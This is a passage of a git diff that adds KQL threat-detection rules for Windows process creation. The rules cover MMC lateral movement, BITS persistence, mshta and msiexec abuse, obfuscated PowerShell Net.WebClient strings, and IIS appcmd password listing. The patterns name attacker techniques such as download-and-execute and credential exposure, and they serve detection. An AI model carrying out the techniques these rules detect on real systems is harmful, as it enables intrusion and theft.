+| where (ProcessCommandLine contains "list " and (FolderPath endswith "\\appcmd.exe" or ProcessVersionInfoOriginalFileName =~ "appcmd.exe")) and ((ProcessCommandLine contains " /config" or ProcessCommandLine contains " /xml" or ProcessCommandLine contains " -config" or ProcessCommandLine contains " -xml") or ((ProcessCommandLine contains " /@t" or ProcessCommandLine contains " /text" or ProcessCommandLine contains " /show" or ProcessCommandLine contains " -@t" or ProcessCommandLine contains " -text" or ProcessCommandLine contains " -show") and (ProcessCommandLine contains ":*" or ProcessCommandLine contains "password")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/mmc20_lateral_movement.kql b/KQL/rules/windows/process_creation/mmc20_lateral_movement.kql
new file mode 100644
index 00000000..bba62e68
--- /dev/null
+++ b/KQL/rules/windows/process_creation/mmc20_lateral_movement.kql
@@ -0,0 +1,12 @@
+// Title: MMC20 Lateral Movement
+// Author: @2xxeformyshirt (Security Risk Advisors) - rule; Teymur Kheirkhabarov (idea)
+// Date: 2020-03-04
+// Level: high
+// Description: Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of "-Embedding" as a child of svchost.exe
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.lateral-movement, attack.t1021.003
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "-Embedding" and FolderPath endswith "\\mmc.exe" and InitiatingProcessFolderPath endswith "\\svchost.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/mmc_executing_files_with_reversed_extensions_using_rtlo_abuse.kql b/KQL/rules/windows/process_creation/mmc_executing_files_with_reversed_extensions_using_rtlo_abuse.kql
new file mode 100644
index 00000000..ee4ffaf4
--- /dev/null
+++ b/KQL/rules/windows/process_creation/mmc_executing_files_with_reversed_extensions_using_rtlo_abuse.kql
@@ -0,0 +1,13 @@
+// Title: MMC Executing Files with Reversed Extensions Using RTLO Abuse
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-02-05
+// Level: high
+// Description: Detects malicious behavior where the MMC utility (`mmc.exe`) executes files with reversed extensions caused by Right-to-Left Override (RLO) abuse, disguising them as document formats.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204.002, attack.defense-evasion, attack.t1218.014, attack.t1036.002
+// False Positives:
+//   - Legitimate administrative actions using MMC to execute misnamed `.msc` files.
+//   - Unconventional but non-malicious usage of RLO or reversed extensions.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "cod.msc" or ProcessCommandLine contains "fdp.msc" or ProcessCommandLine contains "ftr.msc" or ProcessCommandLine contains "lmth.msc" or ProcessCommandLine contains "slx.msc" or ProcessCommandLine contains "tdo.msc" or ProcessCommandLine contains "xcod.msc" or ProcessCommandLine contains "xslx.msc" or ProcessCommandLine contains "xtpp.msc") and (FolderPath endswith "\\mmc.exe" or ProcessVersionInfoOriginalFileName =~ "MMC.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/mmc_spawning_windows_shell.kql b/KQL/rules/windows/process_creation/mmc_spawning_windows_shell.kql
new file mode 100644
index 00000000..5d7b1685
--- /dev/null
+++ b/KQL/rules/windows/process_creation/mmc_spawning_windows_shell.kql
@@ -0,0 +1,10 @@
+// Title: MMC Spawning Windows Shell
+// Author: Karneades, Swisscom CSIRT
+// Date: 2019-08-05
+// Level: high
+// Description: Detects a Windows command line executable started from MMC
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.t1021.003
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\mmc.exe" and ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\regsvr32.exe") or FolderPath contains "\\BITSADMIN")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/modify_group_policy_settings.kql b/KQL/rules/windows/process_creation/modify_group_policy_settings.kql
new file mode 100644
index 00000000..98ca15ba
--- /dev/null
+++ b/KQL/rules/windows/process_creation/modify_group_policy_settings.kql
@@ -0,0 +1,12 @@
+// Title: Modify Group Policy Settings
+// Author: frack113
+// Date: 2022-08-19
+// Level: medium
+// Description: Detect malicious GPO modifications can be used to implement many other malicious behaviors.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1484.001
+// False Positives:
+//   - Legitimate use
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "GroupPolicyRefreshTimeDC" or ProcessCommandLine contains "GroupPolicyRefreshTimeOffsetDC" or ProcessCommandLine contains "GroupPolicyRefreshTime" or ProcessCommandLine contains "GroupPolicyRefreshTimeOffset" or ProcessCommandLine contains "EnableSmartScreen" or ProcessCommandLine contains "ShellSmartScreenLevel") and ProcessCommandLine contains "\\SOFTWARE\\Policies\\Microsoft\\Windows\\System" and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/monitoring_for_persistence_via_bits.kql b/KQL/rules/windows/process_creation/monitoring_for_persistence_via_bits.kql
new file mode 100644
index 00000000..ca21e44d
--- /dev/null
+++ b/KQL/rules/windows/process_creation/monitoring_for_persistence_via_bits.kql
@@ -0,0 +1,13 @@
+// Title: Monitoring For Persistence Via BITS
+// Author: Sreeman
+// Date: 2020-10-29
+// Level: medium
+// Description: BITS will allow you to schedule a command to execute after a successful download to notify you that the job is finished.
+// When the job runs on the system the command specified in the BITS job will be executed.
+// This can be abused by actors to create a backdoor within the system and for persistence.
+// It will be chained in a BITS job to schedule the download of malware/additional binaries and execute the program after being downloaded.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1197
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe") and ((ProcessCommandLine contains "/SetNotifyCmdLine" and (ProcessCommandLine contains "%COMSPEC%" or ProcessCommandLine contains "cmd.exe" or ProcessCommandLine contains "regsvr32.exe")) or (ProcessCommandLine contains "/Addfile" and (ProcessCommandLine contains "http:" or ProcessCommandLine contains "https:" or ProcessCommandLine contains "ftp:" or ProcessCommandLine contains "ftps:")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/msdt_execution_via_answer_file.kql b/KQL/rules/windows/process_creation/msdt_execution_via_answer_file.kql
new file mode 100644
index 00000000..7110ffa0
--- /dev/null
+++ b/KQL/rules/windows/process_creation/msdt_execution_via_answer_file.kql
@@ -0,0 +1,12 @@
+// Title: MSDT Execution Via Answer File
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-13
+// Level: high
+// Description: Detects execution of "msdt.exe" using an answer file which is simulating the legitimate way of calling msdt via "pcwrun.exe" (For example from the compatibility tab).
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218, attack.execution
+// False Positives:
+//   - Possible undocumented parents of "msdt" other than "pcwrun".
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "\\WINDOWS\\diagnostics\\index\\PCWDiagnostic.xml" and (ProcessCommandLine contains " -af " or ProcessCommandLine contains " /af " or ProcessCommandLine contains " –af " or ProcessCommandLine contains " —af " or ProcessCommandLine contains " ―af ") and FolderPath endswith "\\msdt.exe") and (not(InitiatingProcessFolderPath endswith "\\pcwrun.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/msexchange_transport_agent_installation.kql b/KQL/rules/windows/process_creation/msexchange_transport_agent_installation.kql
new file mode 100644
index 00000000..d9a412f5
--- /dev/null
+++ b/KQL/rules/windows/process_creation/msexchange_transport_agent_installation.kql
@@ -0,0 +1,12 @@
+// Title: MSExchange Transport Agent Installation
+// Author: Tobias Michalski (Nextron Systems)
+// Date: 2021-06-08
+// Level: medium
+// Description: Detects the Installation of a Exchange Transport Agent
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1505.002
+// False Positives:
+//   - Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this.
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "Install-TransportAgent"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/mshta_execution_with_suspicious_file_extensions.kql b/KQL/rules/windows/process_creation/mshta_execution_with_suspicious_file_extensions.kql
new file mode 100644
index 00000000..1241c065
--- /dev/null
+++ b/KQL/rules/windows/process_creation/mshta_execution_with_suspicious_file_extensions.kql
@@ -0,0 +1,15 @@
+// Title: MSHTA Execution with Suspicious File Extensions
+// Author: Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule), Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2019-02-22
+// Level: high
+// Description: Detects execution of mshta.exe with file types that looks like they do not typically represent HTA (HTML Application) content,
+// such as .png, .jpg, .zip, .pdf, and others, which are often polyglots. MSHTA is a legitimate Windows utility for executing HTML Applications
+// containing VBScript or JScript. Threat actors often abuse this lolbin utility to download and
+// execute malicious scripts disguised as benign files or hosted under misleading extensions to evade detection.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1140, attack.t1218.005, attack.execution, attack.t1059.007, cve.2020-1599
+// False Positives:
+//   - False positives depend on scripts and administrative tools used in the monitored environment
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains ".7z" or ProcessCommandLine contains ".avi" or ProcessCommandLine contains ".bat" or ProcessCommandLine contains ".bmp" or ProcessCommandLine contains ".conf" or ProcessCommandLine contains ".csv" or ProcessCommandLine contains ".dll" or ProcessCommandLine contains ".doc" or ProcessCommandLine contains ".gif" or ProcessCommandLine contains ".gz" or ProcessCommandLine contains ".ini" or ProcessCommandLine contains ".jpe" or ProcessCommandLine contains ".jpg" or ProcessCommandLine contains ".json" or ProcessCommandLine contains ".lnk" or ProcessCommandLine contains ".log" or ProcessCommandLine contains ".mkv" or ProcessCommandLine contains ".mp3" or ProcessCommandLine contains ".mp4" or ProcessCommandLine contains ".pdf" or ProcessCommandLine contains ".png" or ProcessCommandLine contains ".ppt" or ProcessCommandLine contains ".rar" or ProcessCommandLine contains ".rtf" or ProcessCommandLine contains ".svg" or ProcessCommandLine contains ".tar" or ProcessCommandLine contains ".tmp" or ProcessCommandLine contains ".txt" or ProcessCommandLine contains ".xls" or ProcessCommandLine contains ".xml" or ProcessCommandLine contains ".yaml" or ProcessCommandLine contains ".yml" or ProcessCommandLine contains ".zip" or ProcessCommandLine contains "vbscript") and (FolderPath endswith "\\mshta.exe" or ProcessVersionInfoOriginalFileName =~ "mshta.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/mshtml_dll_runhtmlapplication_suspicious_usage.kql b/KQL/rules/windows/process_creation/mshtml_dll_runhtmlapplication_suspicious_usage.kql
new file mode 100644
index 00000000..ad203736
--- /dev/null
+++ b/KQL/rules/windows/process_creation/mshtml_dll_runhtmlapplication_suspicious_usage.kql
@@ -0,0 +1,12 @@
+// Title: Mshtml.DLL RunHTMLApplication Suspicious Usage
+// Author: Nasreddine Bencherchali (Nextron Systems),  Florian Roth (Nextron Systems), Josh Nickels, frack113, Zaw Min Htun (ZETA)
+// Date: 2022-08-14
+// Level: high
+// Description: Detects execution of commands that leverage the "mshtml.dll" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, http...)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "#135" or ProcessCommandLine contains "RunHTMLApplication") and (ProcessCommandLine contains "\\..\\" and ProcessCommandLine contains "mshtml")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/msiexec_quiet_installation.kql b/KQL/rules/windows/process_creation/msiexec_quiet_installation.kql
new file mode 100644
index 00000000..d78d366c
--- /dev/null
+++ b/KQL/rules/windows/process_creation/msiexec_quiet_installation.kql
@@ -0,0 +1,13 @@
+// Title: Msiexec Quiet Installation
+// Author: frack113
+// Date: 2022-01-16
+// Level: medium
+// Description: Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.
+// Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.007
+// False Positives:
+//   - WindowsApps installing updates via the quiet flag
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "-i" or ProcessCommandLine contains "/i" or ProcessCommandLine contains "–i" or ProcessCommandLine contains "—i" or ProcessCommandLine contains "―i" or ProcessCommandLine contains "-package" or ProcessCommandLine contains "/package" or ProcessCommandLine contains "–package" or ProcessCommandLine contains "—package" or ProcessCommandLine contains "―package" or ProcessCommandLine contains "-a" or ProcessCommandLine contains "/a" or ProcessCommandLine contains "–a" or ProcessCommandLine contains "—a" or ProcessCommandLine contains "―a" or ProcessCommandLine contains "-j" or ProcessCommandLine contains "/j" or ProcessCommandLine contains "–j" or ProcessCommandLine contains "—j" or ProcessCommandLine contains "―j") and (FolderPath endswith "\\msiexec.exe" or ProcessVersionInfoOriginalFileName =~ "msiexec.exe") and (ProcessCommandLine contains "-q" or ProcessCommandLine contains "/q" or ProcessCommandLine contains "–q" or ProcessCommandLine contains "—q" or ProcessCommandLine contains "―q")) and (not((((ProcessIntegrityLevel in~ ("System", "S-1-16-16384")) and InitiatingProcessFolderPath =~ "C:\\Windows\\CCM\\Ccm32BitLauncher.exe") or InitiatingProcessFolderPath startswith "C:\\Windows\\Temp\\" or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" and InitiatingProcessFolderPath startswith "C:\\Users\\"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/msiexec_web_install.kql b/KQL/rules/windows/process_creation/msiexec_web_install.kql
new file mode 100644
index 00000000..abc7506a
--- /dev/null
+++ b/KQL/rules/windows/process_creation/msiexec_web_install.kql
@@ -0,0 +1,12 @@
+// Title: MsiExec Web Install
+// Author: Florian Roth (Nextron Systems)
+// Date: 2018-02-09
+// Level: medium
+// Description: Detects suspicious msiexec process starts with web addresses as parameter
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.007, attack.command-and-control, attack.t1105
+// False Positives:
+//   - False positives depend on scripts and administrative tools used in the monitored environment
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " msiexec" and ProcessCommandLine contains "://"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/mstsc_exe_execution_from_uncommon_parent.kql b/KQL/rules/windows/process_creation/mstsc_exe_execution_from_uncommon_parent.kql
new file mode 100644
index 00000000..2f6bda36
--- /dev/null
+++ b/KQL/rules/windows/process_creation/mstsc_exe_execution_from_uncommon_parent.kql
@@ -0,0 +1,12 @@
+// Title: Mstsc.EXE Execution From Uncommon Parent
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-04-18
+// Level: high
+// Description: Detects potential RDP connection via Mstsc using a local ".rdp" file located in suspicious locations.
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\mstsc.exe" or ProcessVersionInfoOriginalFileName =~ "mstsc.exe") and (InitiatingProcessFolderPath endswith "\\brave.exe" or InitiatingProcessFolderPath endswith "\\CCleanerBrowser.exe" or InitiatingProcessFolderPath endswith "\\chrome.exe" or InitiatingProcessFolderPath endswith "\\chromium.exe" or InitiatingProcessFolderPath endswith "\\firefox.exe" or InitiatingProcessFolderPath endswith "\\iexplore.exe" or InitiatingProcessFolderPath endswith "\\microsoftedge.exe" or InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\opera.exe" or InitiatingProcessFolderPath endswith "\\vivaldi.exe" or InitiatingProcessFolderPath endswith "\\whale.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/mstsc_exe_execution_with_local_rdp_file.kql b/KQL/rules/windows/process_creation/mstsc_exe_execution_with_local_rdp_file.kql
new file mode 100644
index 00000000..f8c8e76b
--- /dev/null
+++ b/KQL/rules/windows/process_creation/mstsc_exe_execution_with_local_rdp_file.kql
@@ -0,0 +1,12 @@
+// Title: Mstsc.EXE Execution With Local RDP File
+// Author: Nasreddine Bencherchali (Nextron Systems), Christopher Peacock @securepeacock
+// Date: 2023-04-18
+// Level: low
+// Description: Detects potential RDP connection via Mstsc using a local ".rdp" file
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+// False Positives:
+//   - Likely with legitimate usage of ".rdp" files
+
+DeviceProcessEvents
+| where ((ProcessCommandLine endswith ".rdp" or ProcessCommandLine endswith ".rdp\"") and (FolderPath endswith "\\mstsc.exe" or ProcessVersionInfoOriginalFileName =~ "mstsc.exe")) and (not((ProcessCommandLine contains "C:\\ProgramData\\Microsoft\\WSL\\wslg.rdp" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\lxss\\wslhost.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/msxsl_exe_execution.kql b/KQL/rules/windows/process_creation/msxsl_exe_execution.kql
new file mode 100644
index 00000000..fdb921c9
--- /dev/null
+++ b/KQL/rules/windows/process_creation/msxsl_exe_execution.kql
@@ -0,0 +1,13 @@
+// Title: Msxsl.EXE Execution
+// Author: Timur Zinniatullin, oscd.community
+// Date: 2019-10-21
+// Level: medium
+// Description: Detects the execution of the MSXSL utility. This can be used to execute Extensible Stylesheet Language (XSL) files. These files are commonly used to describe the processing and rendering of data within XML files.
+// Adversaries can abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1220
+// False Positives:
+//   - Msxsl is not installed by default and is deprecated, so unlikely on most systems.
+
+DeviceProcessEvents
+| where FolderPath endswith "\\msxsl.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/net_webclient_casing_anomalies.kql b/KQL/rules/windows/process_creation/net_webclient_casing_anomalies.kql
new file mode 100644
index 00000000..f63a8bc5
--- /dev/null
+++ b/KQL/rules/windows/process_creation/net_webclient_casing_anomalies.kql
@@ -0,0 +1,10 @@
+// Title: Net WebClient Casing Anomalies
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-05-24
+// Level: high
+// Description: Detects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. nEt.WEbCliEnT) string as used in obfuscation techniques
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "TgBlAFQALgB3AEUAQg" or ProcessCommandLine contains "4AZQBUAC4AdwBFAEIA" or ProcessCommandLine contains "OAGUAVAAuAHcARQBCA" or ProcessCommandLine contains "bgBFAHQALgB3AGUAYg" or ProcessCommandLine contains "4ARQB0AC4AdwBlAGIA" or ProcessCommandLine contains "uAEUAdAAuAHcAZQBiA" or ProcessCommandLine contains "TgBFAHQALgB3AGUAYg" or ProcessCommandLine contains "OAEUAdAAuAHcAZQBiA" or ProcessCommandLine contains "bgBlAFQALgB3AGUAYg" or ProcessCommandLine contains "4AZQBUAC4AdwBlAGIA" or ProcessCommandLine contains "uAGUAVAAuAHcAZQBiA" or ProcessCommandLine contains "TgBlAFQALgB3AGUAYg" or ProcessCommandLine contains "OAGUAVAAuAHcAZQBiA" or ProcessCommandLine contains "bgBFAFQALgB3AGUAYg" or ProcessCommandLine contains "4ARQBUAC4AdwBlAGIA" or ProcessCommandLine contains "uAEUAVAAuAHcAZQBiA" or ProcessCommandLine contains "bgBlAHQALgBXAGUAYg" or ProcessCommandLine contains "4AZQB0AC4AVwBlAGIA" or ProcessCommandLine contains "uAGUAdAAuAFcAZQBiA" or ProcessCommandLine contains "bgBFAHQALgBXAGUAYg" or ProcessCommandLine contains "4ARQB0AC4AVwBlAGIA" or ProcessCommandLine contains "uAEUAdAAuAFcAZQBiA" or ProcessCommandLine contains "TgBFAHQALgBXAGUAYg" or ProcessCommandLine contains "OAEUAdAAuAFcAZQBiA" or ProcessCommandLine contains "bgBlAFQALgBXAGUAYg" or ProcessCommandLine contains "4AZQBUAC4AVwBlAGIA" or ProcessCommandLine contains "uAGUAVAAuAFcAZQBiA" or ProcessCommandLine contains "TgBlAFQALgBXAGUAYg" or ProcessCommandLine contains "OAGUAVAAuAFcAZQBiA" or ProcessCommandLine contains "bgBFAFQALgBXAGUAYg" or ProcessCommandLine contains "4ARQBUAC4AVwBlAGIA" or ProcessCommandLine contains "uAEUAVAAuAFcAZQBiA" or ProcessCommandLine contains "bgBlAHQALgB3AEUAYg" or ProcessCommandLine contains "4AZQB0AC4AdwBFAGIA" or ProcessCommandLine contains "uAGUAdAAuAHcARQBiA" or ProcessCommandLine contains "TgBlAHQALgB3AEUAYg" or ProcessCommandLine contains "OAGUAdAAuAHcARQBiA" or ProcessCommandLine contains "bgBFAHQALgB3AEUAYg" or ProcessCommandLine contains "4ARQB0AC4AdwBFAGIA" or ProcessCommandLine contains "uAEUAdAAuAHcARQBiA" or ProcessCommandLine contains "TgBFAHQALgB3AEUAYg" or ProcessCommandLine contains "OAEUAdAAuAHcARQBiA" or ProcessCommandLine contains "bgBlAFQALgB3AEUAYg" or ProcessCommandLine contains "4AZQBUAC4AdwBFAGIA" or ProcessCommandLine contains "uAGUAVAAuAHcARQBiA" or ProcessCommandLine contains "TgBlAFQALgB3AEUAYg" or ProcessCommandLine contains "OAGUAVAAuAHcARQBiA" or ProcessCommandLine contains "bgBFAFQALgB3AEUAYg" or ProcessCommandLine contains "4ARQBUAC4AdwBFAGIA" or ProcessCommandLine contains "uAEUAVAAuAHcARQBiA" or ProcessCommandLine contains "TgBFAFQALgB3AEUAYg" or ProcessCommandLine contains "OAEUAVAAuAHcARQBiA" or ProcessCommandLine contains "bgBlAHQALgBXAEUAYg" or ProcessCommandLine contains "4AZQB0AC4AVwBFAGIA" or ProcessCommandLine contains "uAGUAdAAuAFcARQBiA" or ProcessCommandLine contains "TgBlAHQALgBXAEUAYg" or ProcessCommandLine contains "OAGUAdAAuAFcARQBiA" or ProcessCommandLine contains "bgBFAHQALgBXAEUAYg" or ProcessCommandLine contains "4ARQB0AC4AVwBFAGIA" or ProcessCommandLine contains "uAEUAdAAuAFcARQBiA" or ProcessCommandLine contains "TgBFAHQALgBXAEUAYg" or ProcessCommandLine contains "OAEUAdAAuAFcARQBiA" or ProcessCommandLine contains "bgBlAFQALgBXAEUAYg" or ProcessCommandLine contains "4AZQBUAC4AVwBFAGIA" or ProcessCommandLine contains "uAGUAVAAuAFcARQBiA" or ProcessCommandLine contains "TgBlAFQALgBXAEUAYg" or ProcessCommandLine contains "OAGUAVAAuAFcARQBiA" or ProcessCommandLine contains "bgBFAFQALgBXAEUAYg" or ProcessCommandLine contains "4ARQBUAC4AVwBFAGIA" or ProcessCommandLine contains "uAEUAVAAuAFcARQBiA" or ProcessCommandLine contains "TgBFAFQALgBXAEUAYg" or ProcessCommandLine contains "OAEUAVAAuAFcARQBiA" or ProcessCommandLine contains "bgBlAHQALgB3AGUAQg" or ProcessCommandLine contains "4AZQB0AC4AdwBlAEIA" or ProcessCommandLine contains "uAGUAdAAuAHcAZQBCA" or ProcessCommandLine contains "TgBlAHQALgB3AGUAQg" or ProcessCommandLine contains "OAGUAdAAuAHcAZQBCA" or ProcessCommandLine contains "bgBFAHQALgB3AGUAQg" or ProcessCommandLine contains "4ARQB0AC4AdwBlAEIA" or ProcessCommandLine contains "uAEUAdAAuAHcAZQBCA" or ProcessCommandLine contains "TgBFAHQALgB3AGUAQg" or ProcessCommandLine contains "OAEUAdAAuAHcAZQBCA" or ProcessCommandLine contains "bgBlAFQALgB3AGUAQg" or ProcessCommandLine contains "4AZQBUAC4AdwBlAEIA" or ProcessCommandLine contains "uAGUAVAAuAHcAZQBCA" or ProcessCommandLine contains "TgBlAFQALgB3AGUAQg" or ProcessCommandLine contains "OAGUAVAAuAHcAZQBCA" or ProcessCommandLine contains "bgBFAFQALgB3AGUAQg" or ProcessCommandLine contains "4ARQBUAC4AdwBlAEIA" or ProcessCommandLine contains "uAEUAVAAuAHcAZQBCA" or ProcessCommandLine contains "TgBFAFQALgB3AGUAQg" or ProcessCommandLine contains "OAEUAVAAuAHcAZQBCA" or ProcessCommandLine contains "bgBlAHQALgBXAGUAQg" or ProcessCommandLine contains "4AZQB0AC4AVwBlAEIA" or ProcessCommandLine contains "uAGUAdAAuAFcAZQBCA" or ProcessCommandLine contains "TgBlAHQALgBXAGUAQg" or ProcessCommandLine contains "OAGUAdAAuAFcAZQBCA" or ProcessCommandLine contains "bgBFAHQALgBXAGUAQg" or ProcessCommandLine contains "4ARQB0AC4AVwBlAEIA" or ProcessCommandLine contains "uAEUAdAAuAFcAZQBCA" or ProcessCommandLine contains "TgBFAHQALgBXAGUAQg" or ProcessCommandLine contains "OAEUAdAAuAFcAZQBCA" or ProcessCommandLine contains "bgBlAFQALgBXAGUAQg" or ProcessCommandLine contains "4AZQBUAC4AVwBlAEIA" or ProcessCommandLine contains "uAGUAVAAuAFcAZQBCA" or ProcessCommandLine contains "TgBlAFQALgBXAGUAQg" or ProcessCommandLine contains "OAGUAVAAuAFcAZQBCA" or ProcessCommandLine contains "bgBFAFQALgBXAGUAQg" or ProcessCommandLine contains "4ARQBUAC4AVwBlAEIA" or ProcessCommandLine contains "uAEUAVAAuAFcAZQBCA" or ProcessCommandLine contains "TgBFAFQALgBXAGUAQg" or ProcessCommandLine contains "OAEUAVAAuAFcAZQBCA" or ProcessCommandLine contains "bgBlAHQALgB3AEUAQg" or ProcessCommandLine contains "4AZQB0AC4AdwBFAEIA" or ProcessCommandLine contains "uAGUAdAAuAHcARQBCA" or ProcessCommandLine contains "TgBlAHQALgB3AEUAQg" or ProcessCommandLine contains "OAGUAdAAuAHcARQBCA" or ProcessCommandLine contains "bgBFAHQALgB3AEUAQg" or ProcessCommandLine contains "4ARQB0AC4AdwBFAEIA" or ProcessCommandLine contains "uAEUAdAAuAHcARQBCA" or ProcessCommandLine contains "TgBFAHQALgB3AEUAQg" or ProcessCommandLine contains "OAEUAdAAuAHcARQBCA" or ProcessCommandLine contains "bgBlAFQALgB3AEUAQg" or ProcessCommandLine contains "uAGUAVAAuAHcARQBCA" or ProcessCommandLine contains "bgBFAFQALgB3AEUAQg" or ProcessCommandLine contains "4ARQBUAC4AdwBFAEIA" or ProcessCommandLine contains "uAEUAVAAuAHcARQBCA" or ProcessCommandLine contains "TgBFAFQALgB3AEUAQg" or ProcessCommandLine contains "OAEUAVAAuAHcARQBCA" or ProcessCommandLine contains "TgBlAHQALgBXAEUAQg" or ProcessCommandLine contains "4AZQB0AC4AVwBFAEIA" or ProcessCommandLine contains "OAGUAdAAuAFcARQBCA" or ProcessCommandLine contains "bgBFAHQALgBXAEUAQg" or ProcessCommandLine contains "4ARQB0AC4AVwBFAEIA" or ProcessCommandLine contains "uAEUAdAAuAFcARQBCA" or ProcessCommandLine contains "TgBFAHQALgBXAEUAQg" or ProcessCommandLine contains "OAEUAdAAuAFcARQBCA" or ProcessCommandLine contains "bgBlAFQALgBXAEUAQg" or ProcessCommandLine contains "4AZQBUAC4AVwBFAEIA" or ProcessCommandLine contains "uAGUAVAAuAFcARQBCA" or ProcessCommandLine contains "TgBlAFQALgBXAEUAQg" or ProcessCommandLine contains "OAGUAVAAuAFcARQBCA" or ProcessCommandLine contains "bgBFAFQALgBXAEUAQg" or ProcessCommandLine contains "4ARQBUAC4AVwBFAEIA" or ProcessCommandLine contains "uAEUAVAAuAFcARQBCA") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/netsh_allow_group_policy_on_microsoft_defender_firewall.kql b/KQL/rules/windows/process_creation/netsh_allow_group_policy_on_microsoft_defender_firewall.kql
new file mode 100644
index 00000000..bb50efd1
--- /dev/null
+++ b/KQL/rules/windows/process_creation/netsh_allow_group_policy_on_microsoft_defender_firewall.kql
@@ -0,0 +1,12 @@
+// Title: Netsh Allow Group Policy on Microsoft Defender Firewall
+// Author: frack113
+// Date: 2022-01-09
+// Level: medium
+// Description: Adversaries may modify system firewalls in order to bypass controls limiting network usage
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.004
+// False Positives:
+//   - Legitimate administration activity
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "advfirewall" and ProcessCommandLine contains "firewall" and ProcessCommandLine contains "set" and ProcessCommandLine contains "rule" and ProcessCommandLine contains "group=" and ProcessCommandLine contains "new" and ProcessCommandLine contains "enable=Yes") and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/network_reconnaissance_activity.kql b/KQL/rules/windows/process_creation/network_reconnaissance_activity.kql
new file mode 100644
index 00000000..b036cc04
--- /dev/null
+++ b/KQL/rules/windows/process_creation/network_reconnaissance_activity.kql
@@ -0,0 +1,12 @@
+// Title: Network Reconnaissance Activity
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-02-07
+// Level: high
+// Description: Detects a set of suspicious network related commands often used in recon stages
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1087, attack.t1082, car.2016-03-001
+// False Positives:
+//   - False positives depend on scripts and administrative tools used in the monitored environment
+
